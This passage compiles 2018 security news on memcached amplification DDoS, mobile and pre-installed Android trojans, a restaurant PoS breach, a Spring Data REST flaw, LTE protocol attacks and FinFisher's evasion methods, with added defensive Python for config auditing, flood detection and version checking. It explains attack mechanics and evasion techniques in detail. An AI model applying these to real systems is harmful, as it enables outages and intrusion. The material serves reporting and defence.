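WEAK_ARGS = ["memcached", "-p", "11211", "-U", "11211", "-l", "0.0.0.0"]
HARDENED_ARGS = ["memcached", "-p", "11211", "-U", "0", "-l", "127.0.0.1"]

if __name__ == "__main__":
    print(amplification_by_target(SAMPLE_FLOWS))
    print(audit_memcached_args(WEAK_ARGS))
    print(audit_memcached_args(HARDENED_ARGS))
```

The 15-byte request against a 768,000-byte reply in the sample reproduces the 51,200x factor Cloudflare cites. Binding to a private address and disabling UDP removes the server from the pool of usable reflectors; only the ISP-side anti-spoofing fix mentioned above removes the attack class itself.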

The fear surrounding this new kind of attack is itself an opportunity for cyber criminals: crooks have already started to blackmail companies, demanding a ransom in Monero cryptocurrency to avoid being attacked via memcached servers.

Let’s see how long the 1.7Tbps attack will remain the largest-ever DDoS attack …

Mobile Banking Trojans Targeting Crypto-Currencies
6.3.2018 securityweek Mobil  Android

Mobile malware is now targeting crypto-currencies with the intent of stealing victims’ funds, IBM says.

The immediate result of the massive increase in value that crypto-currencies have registered over the past year was the growth of malicious attacks attempting to steal coins from unsuspecting users. While most of these assaults involved PC malware so far, recent incidents have shown that mobile threats are picking up the pace as well.

Several weeks ago, IBM observed that the TrickBot Trojan was using webinjections to steal virtual coins from its victims by replacing legitimate addresses with those of the attacker. Working in a similar manner, mobile malware is now using screen overlays to trick victims into sending funds to the attacker instead, IBM's security researchers discovered.

According to IBM, mobile malware targeting crypto-coins usually leverages malicious miners to collect coins, but the practice isn’t that profitable, given the limited processing power a mobile device has. Furthermore, users are more likely to discover a mining operation on a mobile device when observing overheating, low performance and faster battery drain.

“Crooks operating mobile banking Trojans don’t install miners on the device. Rather, they typically steal existing coins from unsuspecting owners using mobile malware that creates the same effect as webinjections: cybercriminals trick users with fake on-screen information, steal their access credentials and take over accounts to empty coins into their own wallets,” IBM notes.

Some of the mobile malware families capable of detecting the application opened on a mobile device include ExoBot, BankBot, Marcher, and Mazar. Based on the launched application, these Trojans can display a hardcoded or dynamically fetched overlay and hide the legitimate app screen behind a fake one.

Thus, users end up revealing their credentials to the malware operators, which can then abuse them to access the victim’s account. If a second-factor authorization is required, the malware can hijack it from the compromised device without alerting the victim.

Usually employed in attacks targeting bank accounts, the method has been adapted for the theft of crypto-coins as well, the researchers discovered. Trojans such as BankBot and Marcher have been already packed with the necessary functionality to overlay a fake screen when the user opens relevant wallet apps.

The malware, IBM says, targets multiple virtual currencies, including Bitcoin, Bitcoin Cash, Ethereum, Litecoin, Monero, and others. Although basic-looking, the overlay screens are convincing and can trick users into unknowingly sending their access credentials to an attacker.

“The mobile malware arena already strives to emulate the success of PC banking Trojans and facilitate cross-channel fraud and identity theft. Cryptocurrency is just another target for malware operators looking to get in on the action. Given the rapid evolution of this threat, organizations should invest in mobile threat protection tools to minimize the risk posed by mobile banking Trojans,” IBM concludes.

Cisco Adds Vulnerability Identification to Tetration Platform
6.3.2018 securityweek

Cisco today announced that its Tetration platform can now identify software vulnerabilities and exposures as part of its security capabilities.

Designed to offer workload protection for multi-cloud data centers through a zero-trust model that employs segmentation, the platform can now also detect vulnerabilities associated with software installed on servers.

With support for both on-premises and public cloud workloads, Tetration can now help identify security incidents faster, as well as contain lateral movement, in addition to reducing attack surface, Cisco says.

“Tetration is equipped to identify high severity security events such as Spectre and Meltdown using behavior-based anomalies,” Cisco notes.

The platform maintains an inventory of the software packages installed on the server, along with information on version and publisher. Leveraging the Common Vulnerabilities and Exposures (CVE) database, Tetration can detect packages with known CVEs.

The platform also offers a scorecard ranking the severity of specific vulnerabilities and reveals which servers might be affected, thus helping IT organizations proactively set up filters to find additional vulnerabilities.

Now, Tetration can also collect and maintain information about running processes on each server, on a real-time basis, Cisco announced. This should help IT managers find servers on which specific processes are running or have run. The collected information includes ID, parameters, duration, hash (signature), and the user running the process.

The identification of application behavior deviations from the baseline is also available on the platform, through the monitoring of workloads and networks for behavior that might be suspicious. Tetration first creates an application behavior baseline and then keeps an eye out for any deviations to identify attacks.

“For example, a process might seek to obtain privileged access that it should not have under normal behavior and use that privilege to execute a series of operations. Tetration can provide a time-series view of history to visualize process hierarchy and behavior information,” Cisco says.

The platform can search for specific process events and discover details such as privilege escalation, shell code execution, and side channel attacks.

According to Cisco, process behavior monitoring and identification of vulnerabilities allow Tetration to identify anomalies in minutes and reduce the attack surface up to 85%, while efficient application segmentation minimizes lateral movement. Furthermore, automation allows for a 70% reduction in human intervention to enable a zero-trust model.

“Tetration is powered by big data technologies to support the scale requirements of data centers. It can process comprehensive telemetry information received from servers in real-time (up to 25,000 servers per cluster). Tetration can enforce consistent policy across thousands of applications and tens of millions of policy rules,” Cisco notes.

Facebook improves link security infrastructure by implementing HSTS Preloading
6.3.2018 securityaffairs

Facebook has implemented HSTS preloading that instructs a browser to always use SSL/TLS to communicate with eligible websites.
Facebook has upgraded its link security infrastructure to include HTTP Strict Transport Security (HSTS) preloading that instructs a browser to always use SSL/TLS to communicate with eligible websites.

Facebook and Instagram links will automatically update from HTTP to HTTPS for eligible websites.

“We have recently upgraded our link security infrastructure to include HSTS preloading, which automatically upgrades HTTP links to HTTPS for eligible websites. This will improve people’s security and will also often improve the speed of navigation to sites from Facebook.” reads the announcement published by Facebook.

According to Facebook, the modification aims to improve security and navigation speed for Facebook and Instagram links.
Facebook determines the links that are eligible for HTTPS based on two sources:

The Chromium preload list, which is currently used in most major browsers;
Recording HSTS headers from sites shared on Facebook; in this case, the browser preload list is updated with any sites that serve HSTS with the preload directive.
Facebook invites websites to support HTTPS and sponsors the Let’s Encrypt initiative, which provides free TLS certificates and instructions on how to enable HTTPS for the most common server software.

Triada Trojan Pre-Installed on Low Cost Android Smartphones
5.3.2018 securityweek Android

Security researchers have discovered the sophisticated Triada Trojan in the firmware of more than 40 low-cost Android smartphone models.

Discovered in early 2016 and considered one of the most advanced mobile threats out there, Triada stands out in the crowd because it abuses the Zygote parent process to inject its code in the context of all software on the device. The Trojan uses root privileges to replace system files and resides mainly in the device’s RAM, which makes it difficult to detect.

In April last year, security researchers discovered that Triada had adopted sandbox technology in an attempt to boost its detection evasion capabilities. Specifically, the malware was using the open source sandbox DroidPlugin, which allowed it to dynamically load and run code going through the installation process.

Several months later, in July 2017, Doctor Web reported that Triada was present in the firmware of several low-cost Android smartphones. At the time, the list of infected device models included Leagoo M5 Plus, Leagoo M8, Nomu S10, and Nomu S20.

Now, the security firm reveals that the Trojan comes pre-installed on a larger number of Android smartphone models, even on devices that were launched in December 2017. Overall, over 40 device models were found to be impacted, the security researchers say.

The specific malware variant found on these devices is detected as Android.Triada.231 and includes all of the capabilities a member of the Triada family comes with: it injects its module in the Zygote process to penetrate all running applications on the device.

This allows the Trojan to carry out a broad range of malicious activities without user interaction, such as covertly downloading and launching applications. Designed with a modular architecture, Triada can redirect financial SMS transactions to buy additional content or steal money from the user.

Because the malware authors managed to inject Android.Triada.231 into the libandroid_runtime.so system library, they are able to compromise a device’s firmware during the manufacturing process, and users end up receiving smartphones that have been already infected.

Doctor Web says they notified manufacturers who produced infected devices of the compromise last year, but infected models continue to be produced. One of these is the Leagoo M9 smartphone, which was announced in December 2017.

“Additionally, our analysts’ research showed that the Trojan’s penetration into firmware happened at request of the Leagoo partner, the software developer from Shanghai. This company provided Leagoo with one of its applications to be included into an image of the mobile operating system, as well as with an instruction to add third-party code into the system libraries before their compilation,” Doctor Web says.

Despite this controversial request, the manufacturer didn’t become suspicious and the Trojan ended up on the new smartphone model without any obstacles.

The security researchers also discovered that the malicious application was signed with the same certificate as Android.MulDrop.924, a Trojan discovered in 2016. This suggests that the developer requesting the addition of the code into the mobile operating system image might be involved in the distribution of Triada.

Doctor Web published a list of the 40 device models infected with Triada, but warns that the list might not be comprehensive, as other compromised smartphones could exist out there. Impacted manufacturers include Leagoo, ARK, Zopo, Doogee, Vertex, Advan, Cubot, Prestigio, Pelitt, and more.

“Such widespread distribution of Android.Triada.231 shows that many Android device manufacturers pay little attention to security questions and penetration of the Trojan code into system components. This can be due to error or malicious intent and is likely common practice,” the researchers point out.

Payment Card Breach Hits Some Applebee's Restaurants
5.3.2018 securityweek

RMH Franchise Holdings revealed on Friday that malware had been found on point-of-sale (PoS) systems at the Applebee’s restaurants it operates as a franchise.

RMH disclosed the incident on Friday afternoon, which often indicates an attempt to avoid the news cycle and fly under the radar. The company posted a link to the data breach notice on the homepage of its website, but it did not announce anything on social media.

According to the data breach notice, the incident affects more than 160 restaurants in Alabama, Arizona, Florida, Illinois, Indiana, Kansas, Kentucky, Missouri, Mississippi, Nebraska, Ohio, Pennsylvania, Texas and Wyoming. This represents nearly all the restaurants operated by RMH.

In a vast majority of cases, the malware was present on PoS systems between December 6, 2017 and January 2, 2018, but in a small number of restaurants the malware had been active since November 23 or December 5, 2017. The company said the breach does not impact payments made online or using self-pay tabletop devices.

The breach was discovered on February 13 and RMH launched an investigation in cooperation with cybersecurity experts and law enforcement.

The company said the malware was designed to collect names, credit or debit card numbers, expiration dates, and card verification codes.

RMH pointed out that its payment systems are isolated from the broader Applebee’s network, which is not affected by this incident.

“Moving forward, RMH is continuing to closely monitor its systems and review its security measures to help prevent something like this from happening again,” RMH said. “RMH is pleased to report that the incident has been contained and guests may use their cards with confidence at the RMH Applebee’s locations that were affected by this incident.”

Several major restaurant chains disclosed payment card breaches last year, including Arby’s, Chipotle, Sonic Drive-In, and Shoney’s. Amazon's Whole Foods Market also informed customers that taprooms and full table-service restaurants at nearly 100 locations were hit by a breach.

Largest Ever 1.3Tbps DDoS Attack Includes Embedded Ransom Demands
5.3.2018 securityweek

[UPDATED - New record set at 1.7Tbps] On Tuesday, February 27, three major DDoS mitigation service providers (Akamai, Cloudflare and Arbor) warned that they had seen spikes in a relatively rare form of reflection/amplification DDoS attack via Memcached servers. Each service provider warned that this type of reflection attack had the potential to deliver far larger attacks.

One day later, Wednesday, February 28, GitHub was hit by the largest DDoS attack that had ever been disclosed -- more than twice the size of the Mirai attack of 2016, peaking at 1.3Tbps. And the potential, in the short term at least, is still for even larger attacks.

Amplification attacks are generated when a server can be 'tricked' into sending a larger response than the initial query. Reflection occurs when the requesting IP is spoofed. The result is that multiple servers can be tricked into sending large responses to a single target IP, rapidly overwhelming it with the volume sent.

Memcached servers are particularly vulnerable to such a use whenever they are left accessible from the public internet. In theory, this should never -- or at least very rarely -- happen; in practice there are various estimates of between 50,000 and more than 100,000 vulnerable servers. Because the service was designed for use internally within data centers, it has no inbuilt security and can be easily compromised by attackers.

The purpose of Memcached servers is to cache frequently used data to improve internal access speeds. Its default service is via UDP. Because it can be easily compromised, the data it caches can be configured by the attackers. The result is that small requests to the server can result in very large replies from the cache. Researchers suggest, in theory, the reply could be up to 51,000 times the size of the request. This is the amplification side of the attack -- the ability to amplify a 203-byte request into a 100-megabyte response.

If the requests include a spoofed IP address, the reply can be sent to a different target IP address. This is the redirection side of the attack. If successive requests are made to multiple compromised Memcached servers all delivered to a single target IP, the result is an amplification/redirection DDoS attack such as that delivered against GitHub on 28 February.
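Seen from the target, the amplification/reflection pattern described above has a recognisable shape in flow data. The following added example (not GitHub's or Akamai's tooling) flags it over constructed flow records; the record format and the thresholds are assumptions.

```python
"""Spot a memcached reflection flood in flow records, from the target's
side of the attack described above.

Reflected memcached traffic is UDP whose *source* port is 11211, arriving
from many unrelated reflectors, landing on one destination and carrying
large datagrams (the cache's replies are split into ~1400-byte UDP
frames).  The record format is constructed for this example:
    timestamp proto src_ip:port dst_ip:port bytes packets
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List

MEMCACHED_PORT = 11211

# Constructed sample: three reflectors flooding 198.51.100.10, mixed with
# a legitimate DNS reply, an HTTPS session and an internal cache lookup.
SAMPLE_FLOWS = """\
2018-02-28T17:21:01Z UDP 203.0.113.5:11211 198.51.100.10:443 734003200 512000
2018-02-28T17:21:01Z UDP 203.0.113.9:11211 198.51.100.10:443 690000000 480000
2018-02-28T17:21:02Z UDP 203.0.113.77:11211 198.51.100.10:443 701000000 500000
2018-02-28T17:21:02Z UDP 192.0.2.53:53 198.51.100.10:40012 512 1
2018-02-28T17:21:03Z TCP 192.0.2.8:51514 198.51.100.10:443 8400 20
2018-02-28T17:21:03Z UDP 10.0.0.5:11211 10.0.0.6:40555 2000 4
"""


@dataclass
class Flow:
    ts: str
    proto: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    nbytes: int
    packets: int


def parse_flows(text: str) -> List[Flow]:
    """Parse the constructed whitespace-separated record format."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, proto, src, dst, nbytes, pkts = line.split()
        sip, sport = src.rsplit(":", 1)
        dip, dport = dst.rsplit(":", 1)
        flows.append(Flow(ts, proto, sip, int(sport), dip, int(dport),
                          int(nbytes), int(pkts)))
    return flows


@dataclass
class Suspect:
    target: str
    reflectors: int          # distinct source IPs answering from 11211
    total_bytes: int
    avg_packet_bytes: float  # large for amplified replies, small for lookups


def detect_reflection(flows: Iterable[Flow], min_reflectors: int = 3,
                      min_bytes: int = 100_000_000) -> List[Suspect]:
    """Group UDP flows sourced from port 11211 by destination and report every
    destination reached by >= min_reflectors sources and >= min_bytes in total.
    The thresholds are assumptions to tune per network."""
    per_target: Dict[str, dict] = defaultdict(
        lambda: {"srcs": set(), "bytes": 0, "pkts": 0})
    for f in flows:
        if f.proto != "UDP" or f.src_port != MEMCACHED_PORT:
            continue
        agg = per_target[f.dst_ip]
        agg["srcs"].add(f.src_ip)
        agg["bytes"] += f.nbytes
        agg["pkts"] += f.packets

    suspects = []
    for target, agg in per_target.items():
        if len(agg["srcs"]) >= min_reflectors and agg["bytes"] >= min_bytes:
            suspects.append(Suspect(target, len(agg["srcs"]), agg["bytes"],
                                    agg["bytes"] / agg["pkts"]))
    return sorted(suspects, key=lambda s: s.total_bytes, reverse=True)


if __name__ == "__main__":
    for s in detect_reflection(parse_flows(SAMPLE_FLOWS)):
        print(f"{s.target}: {s.reflectors} reflectors, {s.total_bytes / 1e9:.2f} GB, "
              f"avg {s.avg_packet_bytes:.0f} B/packet")
```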

This attack was described by GitHub Engineering on Thursday. "The attack originated from over a thousand different autonomous systems (ASNs) across tens of thousands of unique endpoints." It started at 17:21 UTC when GitHub's network monitoring detected an anomaly in the ratio of ingress to egress traffic. Within 5 minutes GitHub decided to call on Akamai's DDoS mitigation service.

"At 17:26 UTC the command was initiated via our ChatOps tooling to withdraw BGP announcements over transit providers and announce AS36459 exclusively over our links to Akamai." Akamai took over mitigation, and by 17:30, GitHub had recovered. Akamai's own statistics show that the attack peaked at 1.35 Tbps before tailing off; and was followed by a smaller, yet still very large, attack of around 400 Gbps just after 18:00 UTC.

Akamai's own brief report on the incident comments, "Many other organizations have experienced similar reflection attacks since Monday, and we predict many more, potentially larger attacks in the near future. Akamai has seen a marked increase in scanning for open memcached servers since the initial disclosure."

Small DDoS attacks are often delivered as an extortion 'warning', with a demand for payment to prevent a larger attack. Cybereason has noticed that this process was reversed in the GitHub attack -- the attack itself contained the extortion demand: "the same memcached servers used in the largest DDoS attack to date are including a ransom note in the payload that they're serving," it reported on Friday.

The extortion note, which occurs in a line of Python code delivered by the compromised Memcached servers, demands payment of 50 XMR (the symbol for the Monero cryptocurrency). This would have been approximately $15,000.

"It is a pretty clever trick to embed the ransom demand inside the DOS payload," Nick Bilogorskiy, cybersecurity strategist at Juniper Networks, told SecurityWeek. "It is also fitting with the times that attackers are asking for Monero rather than Bitcoin because Monero disguises the origin, destination and amount of each transaction, making it more suitable for ransoms."

There is no way of knowing whether any of the recent Memcached DDoS victims have paid a Monero ransom.

Memcached attacks are not entirely new, but have been relatively rare before the last ten days. The DDosMon from Qihoo 360 monitors amplification attack vectors and its figures show generally less than 100 attacks per day since at least November 2017. On 24 February this spiked to more than 400 attacks, followed by an increase to more than 700 in the following days.

It is thought that until recently Memcached attacks were deployed manually by skilled attackers, but that the attack techniques have now been weaponized and made available to all skill-levels via so-called booter/stresser botnets. This is what makes it likely that there will be more and potentially larger Memcached attacks in the future.

But it's not all doom and gloom. The number of vulnerable servers is already decreasing as operators begin to secure their Memcached servers.

"Overall memcached is expected to top the DDoS charts for a relatively short period of time," Ashley Stephenson, CEO, Corero Network Security, told SecurityWeek by email. "Ironically, as we have seen before, the more attackers who try to leverage this vector the weaker the resulting DDoS attacks as the total bandwidth of vulnerable servers is fixed and is shared across the victims. If a single attack could reach 200G, then with only 10 bad actors worldwide trying to use this vector at the same time they may only get 20G each. If there are hundreds of potential bad actors jumping on the memcached bandwagon, this once mighty resource could end up delivering just a trickle of an attack to each intended victim."

UPDATE - New record set at 1.7Tbps - As predicted, the Memcached DDoS methodology has already created a new world record. Netscout Arbor has today confirmed a 1.7Tbps DDoS attack against the customer of a U.S.-based service provider. This attack was recorded by Netscout Arbor’s ATLAS global traffic and threat data system, and is more than 2x the largest Netscout Arbor had previously seen. No further details are yet available.

Critical flaw in Pivotal’s Spring Data REST allows attackers to hack any machine that runs an application built on its components
5.3.2018 securityaffairs

A critical flaw in Pivotal’s Spring Data REST allows remote attackers to execute arbitrary commands on any machine that runs an application built using its components.
Pivotal’s Spring Data REST project is affected by a critical vulnerability, tracked as CVE-2017-8046, that was discovered by security researchers at Semmle/lgtm.

Pivotal’s Spring Framework is a platform widely used by development teams for building web applications.

Spring Data REST builds on top of Spring Data repositories and exposes hypermedia-driven HTTP resources (collection, item, and association resources) for the aggregates contained in the model.

The components included in the Spring Data REST are used by developers to build Java applications that offer RESTful APIs to underlying Spring Data repositories.

The vulnerability is similar to the weaknesses found in Apache Struts that resulted in the Equifax data breach.

“Security researchers at lgtm.com have discovered a critical remote code execution vulnerability that affects various projects in Pivotal Spring, the world’s most popular framework for building web applications.” reads the security advisory published by Semmle/lgtm. “The vulnerability allows attackers to execute arbitrary commands on any machine that runs an application built using Spring Data REST.”


This flaw stems from the way Spring’s own expression language (SpEL) is used in the Data REST component. The lack of validation of user input allows an attacker to execute arbitrary commands on any machine that runs an application built using Spring Data REST.

“Virtually every modern web application will contain components that communicate through REST interfaces, ranging from online travel booking systems, mobile applications and internet banking services,” continues the advisory.

Pivotal issued a security patch for a vulnerability it refers to as DATAREST-1127 as part of its Spring Boot 2.0 update.

“Malicious PATCH requests submitted to spring-data-rest servers can use specially crafted JSON data to run arbitrary Java code.” reads the security advisory published by Pivotal.

Researchers from lgtm.com worked closely with Pivotal to fix the issue before disclosing it publicly; the intent was to give Spring Data REST users sufficient time to update their apps.

The experts urge users to apply the fix, because the flaw allows remote attackers to execute arbitrary commands on any machine that runs an application built using Spring Data REST.

The exploitation of the flaw in RESTful APIs could allow hackers to easily gain control over production servers and access sensitive information.

“This vulnerability in Spring Data REST is unfortunately very easy to exploit. As it is common for RESTful APIs to be publicly accessible, it potentially allows bad actors to easily gain control over production servers and obtain sensitive user data.” explained Man Yue Mo, lgtm.com security researcher at Semmle who discovered the issue.

The affected Spring products and components are:

Spring Data REST components, versions prior to 2.5.12, 2.6.7, 3.0RC3
(Maven artifacts: spring-data-rest-core, spring-data-rest-webmvc, spring-data-rest-distribution, spring-data-rest-hal-browser)
Spring Boot, versions prior to 2.0.0M4
(when using the included Spring Data REST component: spring-boot-starter-data-rest)
Spring Data, versions prior to Kay-RC3
Hurry up and upgrade the above components to the latest versions.
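A version check against the affected-version list above, as an added example that is not Pivotal's or Semmle's tooling: it parses Spring-style version strings (MAJOR.MINOR.PATCH with M/RC/RELEASE qualifiers, an assumption about Spring's scheme) and scans a constructed pom.xml for the artifacts the advisory names.

```python
"""Check Maven dependency versions against the fixed versions Pivotal lists
for CVE-2017-8046 (cut-offs taken from the advisory text above).

Assumption: Spring versions look like MAJOR.MINOR.PATCH followed by an
M<n>, RC<n> or RELEASE qualifier.  The pom.xml below is constructed.
"""
import re
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

SPRING_DATA_REST_ARTIFACTS = {
    "spring-data-rest-core", "spring-data-rest-webmvc",
    "spring-data-rest-distribution", "spring-data-rest-hal-browser",
}
# (major, minor) branch -> first fixed version on that branch, per the advisory
FIXED_DATA_REST = {(2, 5): "2.5.12", (2, 6): "2.6.7", (3, 0): "3.0.0.RC3"}
FIXED_BOOT_STARTER = {(2, 0): "2.0.0.M4"}

_QUALIFIER_RANK = {"M": 0, "RC": 1, "RELEASE": 2}     # milestone < RC < GA
_VERSION_RE = re.compile(
    r"^(\d+)\.(\d+)(?:\.(\d+))?(?:[.-]?(M|RC)(\d+)|[.-]?(RELEASE))?$", re.I)


def parse_version(v: str) -> Tuple[int, int, int, int, int]:
    """Sortable key (major, minor, patch, qualifier_rank, qualifier_no);
    a bare 'x.y.z' counts as GA, the same as 'x.y.z.RELEASE'."""
    m = _VERSION_RE.match(v.strip())
    if not m:
        raise ValueError(f"unrecognised Spring version: {v!r}")
    major, minor, patch, qual, qual_no, _release = m.groups()
    if qual:
        rank, num = _QUALIFIER_RANK[qual.upper()], int(qual_no)
    else:
        rank, num = _QUALIFIER_RANK["RELEASE"], 0
    return (int(major), int(minor), int(patch or 0), rank, num)


def is_vulnerable(artifact: str, version: str) -> Optional[bool]:
    """True/False for artifacts the advisory covers, None otherwise."""
    if artifact in SPRING_DATA_REST_ARTIFACTS:
        table = FIXED_DATA_REST
    elif artifact == "spring-boot-starter-data-rest":
        table = FIXED_BOOT_STARTER
    else:
        return None
    key = parse_version(version)
    fixed = table.get(key[:2])
    if fixed is not None:
        return key < parse_version(fixed)
    # Branch not listed: anything older than the oldest fixed branch never got
    # a fix ("versions prior to ..."); anything newer already carries it.
    return key < min(parse_version(f) for f in table.values())


def scan_pom(pom_xml: str) -> List[Tuple[str, str, bool]]:
    """(artifactId, version, vulnerable) for each covered dependency with a
    literal version; ${property} placeholders are skipped, not resolved."""
    results = []
    for dep in ET.fromstring(pom_xml).iter():
        if not dep.tag.endswith("dependency"):          # tags carry the POM namespace
            continue
        fields = {c.tag.split("}")[-1]: (c.text or "").strip() for c in dep}
        artifact, version = fields.get("artifactId", ""), fields.get("version", "")
        if not version or version.startswith("${"):
            continue
        verdict = is_vulnerable(artifact, version)
        if verdict is not None:
            results.append((artifact, version, verdict))
    return results


# Constructed pom.xml fragment: one vulnerable, one fixed, one unresolved version.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <dependencies>
    <dependency>
      <groupId>org.springframework.data</groupId>
      <artifactId>spring-data-rest-webmvc</artifactId>
      <version>2.6.6.RELEASE</version>
    </dependency>
    <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-data-rest</artifactId>
      <version>2.0.0.M5</version>
    </dependency>
    <dependency>
      <groupId>org.springframework.data</groupId>
      <artifactId>spring-data-rest-core</artifactId>
      <version>${spring-data-rest.version}</version>
    </dependency>
  </dependencies>
</project>
"""

if __name__ == "__main__":
    for artifact, version, vulnerable in scan_pom(SAMPLE_POM):
        print(f"{artifact} {version}: {'VULNERABLE' if vulnerable else 'fixed'}")
```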

New attacks on 4G LTE networks can allow to spy on users and spoof emergency alerts
5.3.2018 securityaffairs Mobil 

A group of researchers discovered a number of weaknesses in the 4G LTE networks that could be exploited by attackers to eavesdrop on phone calls and text messages, knock devices offline, track location, and spoof emergency alerts.
A group of researchers from Purdue and the University of Iowa have discovered a number of vulnerabilities affecting the 4G LTE networks that could be exploited by attackers to eavesdrop on phone calls and text messages, knock devices offline, track location, and spoof emergency alerts.

The experts detailed ten different attacks in a research paper; the attacks leverage weaknesses in three critical protocol operations of the cellular network, such as securely attaching a device to 4G LTE networks and maintaining a connection to receive calls and messages.

“In this paper, we investigate the security and privacy of the three critical procedures of the 4G LTE protocol (i.e., attach, detach, and paging), and in the process, uncover potential design flaws of the protocol and unsafe practices employed by the stakeholders.” reads the paper published by the experts. “For exposing vulnerabilities, we propose a model based testing approach LTEInspector which lazily combines a symbolic model checker and a cryptographic protocol verifier in the symbolic attacker model.”

The researchers devised a testing framework dubbed LTEInspector that they used to detect vulnerabilities in LTE radios and networks.

The group tested eight of the ten attacks using SIM cards from four large US carriers.

The researchers demonstrated how to conduct authentication relay attacks that allow them to bypass the network authentication and masquerade as a victim’s device.

An attacker can access 4G LTE networks and impersonate the victim.

“Using LTEInspector, we have uncovered 10 new attacks along with 9 prior attacks, categorized into three abstract classes (i.e., security, user privacy, and disruption of service), in the three procedures of 4G LTE.” continues the paper.
“Notable among our findings is the authentication relay attack that enables an adversary to spoof the location of a legitimate user to the core network without possessing appropriate credentials. To ensure that the exposed attacks pose real threats and are indeed realizable in practice, we have validated 8 of the 10 new attacks and their accompanying adversarial assumptions through experimentation in a real testbed”


The researchers highlighted the dangers related to the exploitation of the flaws: an attacker can spoof the location of the victim’s device, which could interfere with criminal investigations by planting false location information and allow crooks to create fake evidence.

The weaknesses could be exploited by threat actors to cause chaos by injecting warning messages, emergency notices, and Amber alerts into 4G LTE networks.

In one of the scenarios tested by the researchers, a major US carrier never used encryption for control plane messages, allowing an attacker to exploit the issues to eavesdrop on SMS messages and other sensitive data. The good news is that the US carrier promptly addressed the flaw and deployed a fix.

The scary aspect of this research is that the cheap equipment (common software-defined radio devices) and open source 4G LTE protocol software needed to carry out the attacks can be bought by anyone.

Anyone can build the equipment to power the attacks for as little as $1,300 to $3,900.

The researchers announced that they plan to release the proof-of-concept code once the vulnerabilities are fixed.

Applebee restaurants suffered payment card breach
5.3.2018 securityaffairs

RMH Franchise Holdings revealed on Friday afternoon that PoS systems at the Applebee’s restaurants it operates were infected with PoS malware.
Another week, another data breach: RMH Franchise Holdings revealed last week that PoS systems at the Applebee’s restaurants were infected with malware.

The PoS malware was used to collect names, payment card numbers, expiration dates, and card verification codes.

On Friday afternoon, RMH Franchise Holdings published a link to the data breach notice on its website.

“RMH Franchise Holdings (“RMH”) recently learned about a data incident affecting certain payment cards used at RMH-owned Applebee’s restaurants that we operate as a franchisee.” states the notice of the data breach.

“We are providing this notice to our guests as a precaution to inform them of the incident and to call their attention to some steps they can take to help protect themselves. RMH operates its point-of-sale systems isolated from the broader Applebee’s network, and this notice applies only to RMH-owned Applebee’s restaurants.”

The security breach was discovered on February 13; RMH promptly started an investigation with the help of cybersecurity experts and law enforcement.

The infection lasted between December 6, 2017, and January 2, 2018; in some cases the malware had been present on the PoS systems of restaurants since November 23 or December 5, 2017.

Almost every restaurant operated by RMH was impacted: the incident affects more than 160 restaurants in Alabama, Arizona, Florida, Illinois, Indiana, Kansas, Kentucky, Missouri, Mississippi, Nebraska, Ohio, Pennsylvania, Texas, and Wyoming.


The security breach does not affect online payment systems, and clients using self-pay tabletop devices were not affected either.

RMH clarified that its payment systems are isolated from the broader Applebee’s network, which is therefore not affected by the incident.

“After discovering the incident on February 13, 2018, RMH promptly took steps to ensure that it had been contained. In addition to engaging third-party cyber security experts to assist with our investigation, RMH also notified law enforcement about the incident and will continue to cooperate in their investigation.” RMH added.

“Moving forward, RMH is continuing to closely monitor its systems and review its security measures to help prevent something like this from happening again.”

Windows Defender ATP Detects Spyware Used by Law Enforcement: Microsoft
5.3.2018 securityweek

Microsoft Dissects FinFisher’s Complex Infection Process

Windows Defender Advanced Threat Protection (Windows Defender ATP) is capable of detecting behavior associated with the sophisticated FinFisher spyware, Microsoft says, after performing an in-depth analysis of the malware’s infection process.

FinFisher is a lawful interception solution built by Germany-based FinFisher GmbH, which sells it exclusively to governments. Also referred to as FinSpy, the malware has been around for over half a decade and has been associated with various surveillance campaigns.

In September last year, after the malware was observed exploiting a .NET Framework zero-day (CVE-2017-8759) for infection, ESET warned that Internet service providers (ISPs) might be involved in FinFisher’s distribution process.

According to Microsoft, FinFisher is complex enough to require “special methods to crack it” but, despite its sophistication, the malware cannot go unnoticed by its security tools. These include Office 365 Advanced Threat Protection (Office 365 ATP) and Windows Defender ATP, which is set to arrive on Windows 7 and Windows 8.1 devices this summer.

Packed with various detection, evasion and anti-analysis capabilities, including junk instructions and “spaghetti code,” multi-layered virtual machine detection, and several anti-debug and defensive measures, FinFisher wasn’t easy to tear apart and analyze, Microsoft says.

Through the addition of continuous code jumps (spaghetti code), FinFisher’s authors ensured that the program flow is difficult to read and can confuse disassembly programs. While reversing plugins that may help in such situations exist, none was found to work with this malware, and Microsoft had to come up with its own.

The first thing the company discovered was an array of opcode instructions that a custom virtual machine program can interpret. 32 different routines were discovered, each implementing a different opcode and functionality that the malware program may execute.

Not only does the use of virtualized instruction blocks ensure that analysis using regular tools is not possible, but anti-debug and anti-analysis tricks in the virtualized code attempt to evade dynamic analysis tools as well.

“Each virtual instruction is stored in a special data structure that contains all the information needed to be properly read and executed by the VM. […] The VM handler is completely able to generate different code blocks and deal with relocated code due to address space layout randomization (ASLR). It is also able to move code execution into different locations if needed,” the software giant explains.

The first stage of FinFisher is a loader meant to detect sandbox environments. If it passes the initial set of checks, the loader reads four imported libraries from disk (ntdll.dll, kernel32.dll, advapi32.dll, and version.dll) and remaps them in memory, rendering debuggers and software breakpoints useless.

Next, the malware performs additional anti-sandbox checks, likely in an attempt to avoid specific sandbox or security products, and also checks whether it is running in a virtualized environment (VMware or Hyper-V) or under a debugger.

Only if all these checks pass does the loader move to the next step, a second, multi-platform virtual machine.

“The 32-bit stage 2 malware uses a customized loading mechanism (i.e., the PE file has a scrambled IAT and relocation table) and exports only one function. For the 64-bit stage 2 malware, the code execution is transferred from the loader using a well-known technique called Heaven’s Gate,” Microsoft explains.

The 64-bit stage 2 implements another loader and virtual machine, featuring an architecture similar to those in the previous stage, but using slightly different opcodes (which Microsoft lists on their site). The virtual machine extracts and decrypts the stage 3 malware. After decryption, the payload is remapped and executed in memory.

Stage 3, which represents the installation and persistence stage of the malware, is the setup program for FinFisher and no longer employs a VM or obfuscation. The code can install the malware in a UAC-enforced environment with limited privileges, or with full-administrative privileges enabled. However, no privilege escalation code was found in the malware.

